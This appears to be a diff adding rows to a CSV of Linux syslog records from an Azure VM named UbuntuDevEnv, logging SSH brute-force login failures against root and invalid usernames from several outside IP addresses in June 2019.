+13446,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:04,UbuntuDevEnv,2019-06-26 04:40:03,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13447,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:07,UbuntuDevEnv,2019-06-26 04:40:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13448,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:09,UbuntuDevEnv,2019-06-26 04:40:08,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56058 ssh2,130014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56058,,
+13449,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:19,UbuntuDevEnv,2019-06-26 04:40:19,auth,UbuntuDevEnv,info,Connection closed by 119.123.240.8 port 44283 [preauth],130047,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,44283,,
+13450,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:19,UbuntuDevEnv,2019-06-26 04:40:16,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 56058 ssh2],130014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56058,,
+13451,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:20,UbuntuDevEnv,2019-06-26 04:40:20,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56058 ssh2,130014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56058,,
+13452,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:23,UbuntuDevEnv,2019-06-26 04:40:22,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 56058: Too many authentication failures [preauth],130014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,56058,,
+13453,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:23,UbuntuDevEnv,2019-06-26 04:40:22,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13454,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:23,UbuntuDevEnv,2019-06-26 04:40:22,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 56058 ssh2 [preauth],130014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56058,,
+13455,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:23,UbuntuDevEnv,2019-06-26 04:40:22,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,130014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13456,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:23,UbuntuDevEnv,2019-06-26 04:40:22,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56058 ssh2,130014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56058,,
+13457,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:26,UbuntuDevEnv,2019-06-26 04:40:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13458,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:27,UbuntuDevEnv,2019-06-26 04:40:27,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 62043 ssh2,130088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,62043,,
+13459,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:42,UbuntuDevEnv,2019-06-26 04:40:41,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 62043: Too many authentication failures [preauth],130088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,62043,,
+13460,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:42,UbuntuDevEnv,2019-06-26 04:40:41,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,130088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13461,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:42,UbuntuDevEnv,2019-06-26 04:40:41,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 62043 ssh2 [preauth],130088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,62043,,
+13462,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:42,UbuntuDevEnv,2019-06-26 04:40:41,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13463,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:42,UbuntuDevEnv,2019-06-26 04:40:41,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 62043 ssh2],130088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,62043,,
+13464,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:44,UbuntuDevEnv,2019-06-26 04:40:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130147,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13465,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:40:46,UbuntuDevEnv,2019-06-26 04:40:46,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 3484 ssh2,130147,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3484,,
+13466,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:01,UbuntuDevEnv,2019-06-26 04:41:00,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130147,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13467,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:01,UbuntuDevEnv,2019-06-26 04:41:00,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 3484: Too many authentication failures [preauth],130147,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,3484,,
+13468,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:01,UbuntuDevEnv,2019-06-26 04:41:00,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 3484 ssh2 [preauth],130147,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3484,,
+13469,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:01,UbuntuDevEnv,2019-06-26 04:41:00,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 3484 ssh2],130147,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3484,,
+13470,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:01,UbuntuDevEnv,2019-06-26 04:41:00,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,130147,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13471,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:04,UbuntuDevEnv,2019-06-26 04:41:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13472,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:06,UbuntuDevEnv,2019-06-26 04:41:05,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 9373 ssh2,130217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,9373,,
+13473,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:08,UbuntuDevEnv,2019-06-26 04:41:08,auth,UbuntuDevEnv,info,Invalid user nodeserver from 200.6.188.38 port 55957,130245,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nodeserver,200.6.188.3,55957,,
+13474,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:08,UbuntuDevEnv,2019-06-26 04:41:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,130245,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+13475,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:08,UbuntuDevEnv,2019-06-26 04:41:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,130245,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13476,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:09,UbuntuDevEnv,2019-06-26 04:41:08,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 9373 ssh2,130217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,9373,,
+13477,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:10,UbuntuDevEnv,2019-06-26 04:41:10,auth,UbuntuDevEnv,info,Failed password for invalid user nodeserver from 200.6.188.38 port 55957 ssh2,130245,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nodeserver,200.6.188.3,55957,,
+13478,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:10,UbuntuDevEnv,2019-06-26 04:41:10,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 55957:11: Bye Bye [preauth],130245,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,55957,,
+13479,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:10,UbuntuDevEnv,2019-06-26 04:41:10,auth,UbuntuDevEnv,info,Disconnected from invalid user nodeserver 200.6.188.38 port 55957 [preauth],130245,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nodeserver,200.6.188.3,55957,,
+13480,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:11,UbuntuDevEnv,2019-06-26 04:41:11,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 9373 ssh2,130217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,9373,,
+13481,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:12,UbuntuDevEnv,2019-06-26 04:41:12,auth,UbuntuDevEnv,info,Invalid user guest from 196.41.208.238 port 6085,130261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,196.41.208.2,6085,,
+13482,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:12,UbuntuDevEnv,2019-06-26 04:41:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,130261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13483,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:12,UbuntuDevEnv,2019-06-26 04:41:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,130261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+13484,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:13,UbuntuDevEnv,2019-06-26 04:41:12,auth,UbuntuDevEnv,info,Invalid user musikbot from 119.123.240.8 port 47795,130260,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,musikbot,119.123.240.8,47795,,
+13485,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:13,UbuntuDevEnv,2019-06-26 04:41:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.123.240.8,130260,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,,0,
+13486,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:13,UbuntuDevEnv,2019-06-26 04:41:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,130260,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13487,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:14,UbuntuDevEnv,2019-06-26 04:41:14,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 196.41.208.238 port 6085 ssh2,130261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,196.41.208.2,6085,,
+13488,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:14,UbuntuDevEnv,2019-06-26 04:41:14,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 6085:11: Bye Bye [preauth],130261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,6085,,
+13489,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:14,UbuntuDevEnv,2019-06-26 04:41:14,auth,UbuntuDevEnv,info,Disconnected from invalid user guest 196.41.208.238 port 6085 [preauth],130261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,196.41.208.2,6085,,
+13490,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:14,UbuntuDevEnv,2019-06-26 04:41:14,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 9373 ssh2,130217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,9373,,
+13491,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:15,UbuntuDevEnv,2019-06-26 04:41:14,auth,UbuntuDevEnv,info,Failed password for invalid user musikbot from 119.123.240.8 port 47795 ssh2,130260,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,musikbot,119.123.240.8,47795,,
+13492,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:15,UbuntuDevEnv,2019-06-26 04:41:14,auth,UbuntuDevEnv,info,Disconnected from invalid user musikbot 119.123.240.8 port 47795 [preauth],130260,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,musikbot,119.123.240.8,47795,,
+13493,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:15,UbuntuDevEnv,2019-06-26 04:41:14,auth,UbuntuDevEnv,info,Received disconnect from 119.123.240.8 port 47795:11: Bye Bye [preauth],130260,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.123.240.8,47795,,
+13494,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:15,UbuntuDevEnv,2019-06-26 04:41:15,auth,UbuntuDevEnv,info,Invalid user vps from 5.135.161.72 port 40746,130278,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,5.135.161.7,40746,,
+13495,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:15,UbuntuDevEnv,2019-06-26 04:41:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,130278,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13496,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:15,UbuntuDevEnv,2019-06-26 04:41:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,130278,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+13497,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:17,UbuntuDevEnv,2019-06-26 04:41:17,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 9373 ssh2,130217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,9373,,
+13498,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:18,UbuntuDevEnv,2019-06-26 04:41:17,auth,UbuntuDevEnv,info,Failed password for invalid user vps from 5.135.161.72 port 40746 ssh2,130278,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,5.135.161.7,40746,,
+13499,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:18,UbuntuDevEnv,2019-06-26 04:41:17,auth,UbuntuDevEnv,info,Disconnected from invalid user vps 5.135.161.72 port 40746 [preauth],130278,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,5.135.161.7,40746,,
+13500,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:18,UbuntuDevEnv,2019-06-26 04:41:17,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 40746:11: Bye Bye [preauth],130278,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,40746,,
+13501,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:20,UbuntuDevEnv,2019-06-26 04:41:19,auth,UbuntuDevEnv,info,Invalid user teamspeak1 from 95.216.195.95 port 36764,130297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak1,95.216.195.9,36764,,
+13502,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:20,UbuntuDevEnv,2019-06-26 04:41:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,130297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+13503,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:20,UbuntuDevEnv,2019-06-26 04:41:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,130297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13504,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:20,UbuntuDevEnv,2019-06-26 04:41:20,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 9373 ssh2,130217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,9373,,
